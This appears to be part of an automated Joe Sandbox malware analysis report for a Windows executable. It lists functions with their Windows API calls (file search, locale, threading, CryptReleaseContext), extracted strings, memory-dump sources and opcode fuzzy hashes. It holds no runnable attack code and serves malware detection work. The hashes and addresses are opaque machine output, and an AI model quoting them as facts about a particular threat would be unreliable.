      APIs
      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,0040D1BB,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D299), ref: 0040CEA1
      • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040CEB2
      • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?,?,0040D1BB,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?), ref: 0040CFB2
      • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?,?,0040D1BB,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales,00000000,000F0019), ref: 0040CFC4
      • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?,?,0040D1BB,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales,00000000), ref: 0040CFD0
      • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?,?,0040D1BB,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales), ref: 0040D015
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
      • String ID: GetLongPathNameW$\$kernel32.dll
      • API String ID: 1930782624-3908791685
      • Opcode ID: 513bc97edc3a285b3f4b4213d583ed833790a0ac4b592b607f87561b17950973
      • Instruction ID: 72a2b02610064fb6e64a347f8dccdb3cbd3b5c5928c9e3bd0ad0754b881fd8bf
      • Opcode Fuzzy Hash: 513bc97edc3a285b3f4b4213d583ed833790a0ac4b592b607f87561b17950973
      • Instruction Fuzzy Hash: E041A031E00619DBCB10EBA4CC85ADEB3B9EF44314F5486BA9544F72C1E77C9E468B89
      Uniqueness

      Uniqueness Score: -1.00%

      Function 008799FF Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 476COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $ $,y`~$dpnlobby.dll
      • API String ID: 0-3916097650
      • Opcode ID: 4fcf8aecb6c4dd7e887d350c18a81c36cb5dfc523fbe96cafe5bbf09f2af229b
      • Instruction ID: bae1e69e6083ae284282e570cb1da161308b38c74c86f68681f2930064ed2e58
      • Opcode Fuzzy Hash: 4fcf8aecb6c4dd7e887d350c18a81c36cb5dfc523fbe96cafe5bbf09f2af229b
      • Instruction Fuzzy Hash: 2A324C34909269CFEB00DFA8E981ADDBBF5FB4A314F104066E485E7B61D734A942CF15
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00889622 Relevance: 11.9, Strings: 9, Instructions: 698COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $NlsLexicons0007.dll$WMPEncEn.dll$WcsPlugInService.dll$imkrhjd.dll$msjter40.dll
      • API String ID: 0-2932531965
      • Opcode ID: f4a6143c48d78da2b6443c7aad68d7d5eac5de959938cf87e16649466a65ddb2
      • Instruction ID: bf32a8490e79fe6a535159b72d7fe53985cf89a186e1cfd71ff2ee7a7cb9dae1
      • Opcode Fuzzy Hash: f4a6143c48d78da2b6443c7aad68d7d5eac5de959938cf87e16649466a65ddb2
      • Instruction Fuzzy Hash: 307227349042598FDB11EF60C885BCDB7BABF4A308F5080E6D448B7252DB75AE89CF56
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0087A511 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 482encryptionCOMMON
      Download Yara Rule
      APIs
      • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0087AD6C,?,?,?,00000000,0087B0A4,?,?,?,?,00000000,00000000), ref: 0087AC4A
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: ContextCryptRelease
      • String ID: MSTTSuser.dll$OleInitializeWOW$wcsstr
      • API String ID: 829835001-4194434045
      • Opcode ID: 9fc5af2e2b3fbf965cf0547e1570d710481e5c76869b64eaa0073ad2b132d942
      • Instruction ID: 60919dea1fde7c7290e1bc7affbee0b9452ec838a8e796b5fdac6bda563263ff
      • Opcode Fuzzy Hash: 9fc5af2e2b3fbf965cf0547e1570d710481e5c76869b64eaa0073ad2b132d942
      • Instruction Fuzzy Hash: 9932283480529DCFDB10DF60D881ACDB7BABF49304F5081E6D848B7256D775AA89CFA2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00884967 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125encryptionCOMMON
      Download Yara Rule
      APIs
      • CryptReleaseContext.ADVAPI32(00000000,00000000,00884B38,008852E2,?,?,?,?,00000000,00000000,?,00888875,00000000,0088A2A0), ref: 00884A6C
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: ContextCryptRelease
      • String ID: D,y`$api-ms-win-core-util-l1-1-0.dll
      • API String ID: 829835001-3654596676
      • Opcode ID: e72bdd19fac70373ab68961f9b74b878a17058238effaa2eae420ea01d9a4522
      • Instruction ID: a325787f50939f531d6cfea34497d2f82449af8cb1540bcdc645a1f0ab4add37
      • Opcode Fuzzy Hash: e72bdd19fac70373ab68961f9b74b878a17058238effaa2eae420ea01d9a4522
      • Instruction Fuzzy Hash: 5751E076A15229CFDB04EFA8E981ACDB7F4FB09318F11502AE001FB661D735A945CF25
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040CA28 Relevance: 4.6, APIs: 3, Instructions: 99COMMON
      Download Yara Rule
      APIs
      • IsValidLocale.KERNEL32(?,00000002,00000000,0040CB8D,?,?,?,00000000), ref: 0040CAD2
      • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040CB8D,?,?,?,00000000), ref: 0040CAEE
      • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040CB8D,?,?,?,00000000), ref: 0040CAFF
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Locale$Info$Valid
      • String ID:
      • API String ID: 1826331170-0
      • Opcode ID: dc98ea9a91aae6d5a0775f99af886e6dd3c62cdf4629cf988b7c1198aebb0fe8
      • Instruction ID: 23c11aa9885e3c916dff53f67515c36f66bc6504bb74cbc91727a7fed7d712bd
      • Opcode Fuzzy Hash: dc98ea9a91aae6d5a0775f99af886e6dd3c62cdf4629cf988b7c1198aebb0fe8
      • Instruction Fuzzy Hash: 2831AD70A00A1CEBEB20DB60DCC2B9B77B5FB44701F5006BAA509B32D1D6396E80CE19
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00883F6C Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 544encryptionCOMMON
      Download Yara Rule
      APIs
      • CryptDestroyHash.ADVAPI32(?), ref: 00883F70
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: CryptDestroyHash
      • String ID: D,y`
      • API String ID: 174375392-3072986133
      • Opcode ID: ab67b30743256aee4ee3b9a1c14ddcbbbea7e189e2c09e5506ec39e4105f8026
      • Instruction ID: 50bff77f3e6df93792148fc9ba00fbee6659cfa749139e383dae911b241110e4
      • Opcode Fuzzy Hash: ab67b30743256aee4ee3b9a1c14ddcbbbea7e189e2c09e5506ec39e4105f8026
      • Instruction Fuzzy Hash: AA5210344052AE8FDB11DF24D880BC9BBB5BF56308F4491E6C488A7752D7B46B89CF92
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004235B0 Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
      Download Yara Rule
      APIs
      • FindFirstFileW.KERNEL32(00000000,?,00000000,?,00423677,00000000,?,?,?,00899A4F,EDBF3FA1,?,?,0089B6AC,?,00000074), ref: 004235CB
      • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00423677,00000000,?,?,?,00899A4F,EDBF3FA1,?,?,0089B6AC,?), ref: 004235D6
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Find$CloseFileFirst
      • String ID:
      • API String ID: 2295610775-0
      • Opcode ID: dc64fdd914615b049f7e817cb6537e09cab8c4ae1589e8d2fe4e5d1ed68ca6f5
      • Instruction ID: 01a03d814939720a58ed36e95a7979cf1404916787e28f7e552fe1288b409e44
      • Opcode Fuzzy Hash: dc64fdd914615b049f7e817cb6537e09cab8c4ae1589e8d2fe4e5d1ed68ca6f5
      • Instruction Fuzzy Hash: 77E0CD7161430C12C71065F91C8A7AB72DC5B44329F440BA7795CD21D2E63D8B90015D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 027660A3 Relevance: .1, Instructions: 61COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.258419981.0000000002766000.00000040.00000800.00020000.00000000.sdmp, Offset: 02766000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2766000_file.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
      • Instruction ID: c3ff1ecf0eff0b193b3fb83bef835454319a3be22d612f7f4ac43354c248dbb8
      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
      • Instruction Fuzzy Hash: 74118272740101AFD754DF55DCC4FA677EEEB89320B598065ED08CB312D67AE842C760
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040CD40 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
      Download Yara Rule
      APIs
      • EnterCriticalSection.KERNEL32(008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B,?,?,00000000,00000000,00000000), ref: 0040CD5E
      • LeaveCriticalSection.KERNEL32(008ADC14,008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B,?,?,00000000,00000000), ref: 0040CD82
      • LeaveCriticalSection.KERNEL32(008ADC14,008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B,?,?,00000000,00000000), ref: 0040CD91
      • IsValidLocale.KERNEL32(00000000,00000002,008ADC14,008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B), ref: 0040CDA3
      • EnterCriticalSection.KERNEL32(008ADC14,00000000,00000002,008ADC14,008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B), ref: 0040CE00
      • LeaveCriticalSection.KERNEL32(008ADC14,008ADC14,00000000,00000002,008ADC14,008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B), ref: 0040CE29
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: CriticalSection$Leave$Enter$LocaleValid
      • String ID: en-US,en,
      • API String ID: 975949045-3579323720
      • Opcode ID: 6ae5857e4506fbe12fe28e77ee88e855aae8d1fbab5fe6f337aed850c569c3ae
      • Instruction ID: 1e1d3b9349122117005ea94893b3b9f41c4e8d9279000f1fe72f09228e9374f1
      • Opcode Fuzzy Hash: 6ae5857e4506fbe12fe28e77ee88e855aae8d1fbab5fe6f337aed850c569c3ae
      • Instruction Fuzzy Hash: 48216220704710EBE710B76AC89275E2599EF46718B90453BB001F6BC2C9BC8C41D7AE
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00405EE4 Relevance: 10.9, APIs: 7, Instructions: 406COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: b3fb30baf3b69651b762d8113197e9e4446f399f61267d7f4205265ef8e08ec9
      • Instruction ID: e92eaf3ff3e09107ede235038e047a6ff9cc1d11e47e23f17a09ae4ad2eea443
      • Opcode Fuzzy Hash: b3fb30baf3b69651b762d8113197e9e4446f399f61267d7f4205265ef8e08ec9
      • Instruction Fuzzy Hash: E3C14572710A010BE714AA7D9C8476FB686DBC5325F18823FE215EB3D6EA7CCC558B48
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00408930 Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00408DBC: GetCurrentThreadId.KERNEL32 ref: 00408DBF
      • GetTickCount.KERNEL32 ref: 00408967
      • GetTickCount.KERNEL32 ref: 0040897F
      • GetCurrentThreadId.KERNEL32 ref: 004089AE
      • GetTickCount.KERNEL32 ref: 004089D9
      • GetTickCount.KERNEL32 ref: 00408A10
      • GetTickCount.KERNEL32 ref: 00408A3A
      • GetCurrentThreadId.KERNEL32 ref: 00408AAA
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: CountTick$CurrentThread
      • String ID:
      • API String ID: 3968769311-0
      • Opcode ID: d8f76c9983ab303e4a2a6eb0811938a6070511537a287b3d8342561fb0ddf730
      • Instruction ID: 97f6f4a4bb359f6e06a49a51cc82c85dbc79a7bf2bbc3ca021f0fc766c487bd8
      • Opcode Fuzzy Hash: d8f76c9983ab303e4a2a6eb0811938a6070511537a287b3d8342561fb0ddf730
      • Instruction Fuzzy Hash: 454180706083419ED721AE7CC68432BBBD1AF90354F18893FD4D8977C2EE7888818B5B
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004086A8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
      Download Yara Rule
      APIs
      • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 004086BD
      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004086C3
      • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 004086DF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: AddressErrorHandleLastModuleProc
      • String ID: @$GetLogicalProcessorInformation$kernel32.dll
      • API String ID: 4275029093-79381301
      • Opcode ID: df89b094c4fc9ecf5a0342b6ce30508c82d4132e246c04c3c4f41307faea38b2
      • Instruction ID: 15214c6c6b9f0fa70b4615478ddb3ab3236ccbb59b387d90588494102e7edd23
      • Opcode Fuzzy Hash: df89b094c4fc9ecf5a0342b6ce30508c82d4132e246c04c3c4f41307faea38b2
      • Instruction Fuzzy Hash: 5D117274D00208AEDB20EBA5CE45B6EB7B4DB45304F6084BFE854B72C1DB7C9A408F59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00409930 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
      Download Yara Rule
      APIs
      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000,00000000,00409B02,00409B1C,?,?,00410258), ref: 00409969
      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000,00000000,00409B02,00409B1C), ref: 0040996F
      • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000), ref: 0040998A
      • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?), ref: 00409990
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: FileHandleWrite
      • String ID: Error$Runtime error at 00000000
      • API String ID: 3320372497-2970929446
      • Opcode ID: 940674207d66ce2508097593aa5d6adaf40bf27376d7cd72aa1c20ae4ba549f0
      • Instruction ID: 66a8fc6f3927206ba17adebf6fa23ce3f892fd0946112a400a7a9d52c56287d1
      • Opcode Fuzzy Hash: 940674207d66ce2508097593aa5d6adaf40bf27376d7cd72aa1c20ae4ba549f0
      • Instruction Fuzzy Hash: EEF0AFE0640B00B8FA20A3916C17F2B2A58A702B25F54423FB220B9AD3C7BC48C44A69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 006C3048 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
      Download Yara Rule
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: ClearVariant
      • String ID: X*l
      • API String ID: 1473721057-3061925697
      • Opcode ID: e21ce2cafc081b25742dda36fe5fc48425e70b06716ac3f0bdea40936187c092
      • Instruction ID: e2579ad48a9ad2e6a598501fdd0bb7f9e1bcd0190c794d120b178e91e8997215
      • Opcode Fuzzy Hash: e21ce2cafc081b25742dda36fe5fc48425e70b06716ac3f0bdea40936187c092
      • Instruction Fuzzy Hash: 5D01B12270412086DB20BB34C886FB522DBEF05700B60947EB4069F317DB75CE86C7A7
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040CC24 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
      Download Yara Rule
      APIs
      • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040CC35
      • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040CC93
      • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040CCF0
      • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040CD23
        • Part of subcall function 0040CBE0: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040CCA1), ref: 0040CBF7
        • Part of subcall function 0040CBE0: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040CCA1), ref: 0040CC14
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Thread$LanguagesPreferred$Language
      • String ID:
      • API String ID: 2255706666-0
      • Opcode ID: d2c6e7bba8bc72bbbdf077e3e4acd4a6484c427f75bab13a3a274035a5d700a8
      • Instruction ID: b0102d0044ab73f23b321d7d6f6602272ae1975ebb88da2099e514141e5eeb9e
      • Opcode Fuzzy Hash: d2c6e7bba8bc72bbbdf077e3e4acd4a6484c427f75bab13a3a274035a5d700a8
      • Instruction Fuzzy Hash: 4D316F30A0421ADBDB10EFA9D885AAFB7B8FF04314F10467AE515E7391D7789A04CB94
      Uniqueness

      Uniqueness Score: -1.00%

      Function 006C3874 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
      Download Yara Rule
      APIs
      • VariantCopy.OLEAUT32 ref: 006C389C
        • Part of subcall function 006C3048: VariantClear.OLEAUT32 ref: 006C3057
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Variant$ClearCopy
      • String ID: X*l
      • API String ID: 274517740-3061925697
      • Opcode ID: f426b7a77b9917056d4fba03141a3df1ecbde20aff7f728fa90f02b563c57196
      • Instruction ID: cd52d73868f541c82f0ecb16cd641db90badaea0d44612472be3bd043e3e0d3f
      • Opcode Fuzzy Hash: f426b7a77b9917056d4fba03141a3df1ecbde20aff7f728fa90f02b563c57196
      • Instruction Fuzzy Hash: 742195307002218ACB60AF29C4C5FB677E7EF49710714C56EE48B8B316EA74CE86C766
      Uniqueness

      Uniqueness Score: -1.00%